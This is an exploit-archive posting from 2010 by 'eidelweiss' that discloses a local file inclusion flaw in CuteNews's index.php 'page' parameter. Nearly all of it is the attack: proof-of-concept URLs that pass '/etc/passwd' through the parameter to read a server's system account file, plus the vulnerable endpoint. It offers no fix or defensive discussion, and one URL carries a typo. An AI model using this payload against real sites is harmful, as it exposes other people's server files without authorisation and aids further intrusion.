[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : CuteNews (index.php?page) Local File Inclusion Vulnerability
# Published : 2010-10-05
# Author : eidelweiss
# Previous Title : SPAW Editor 2.0.8.1 Local File Inclusion Vulnerability
# Next Title : Uebimiau Webmail 3.2.0-2.0 Local File Inclusion Vulnerability


==========================================================
	CuteNews (page) local File Inclusion Vulnerability
==========================================================
vendor: http://cutephp.com/
Author: eidelweiss
Contact: eidelweiss [at] windowslive [dot] com

==========================================================

vuln: index.php?page=

lfi: /etc/passwd

exploit : index.php?page= [lfi]

	-=[p0c]=-
	
	http://127.0.0.1/index.php?page= [lfi]
			or
	http://127.0.0.1/path/index.php?page=/etc/passwdt

=========================| -=[ E0F ]=- |============================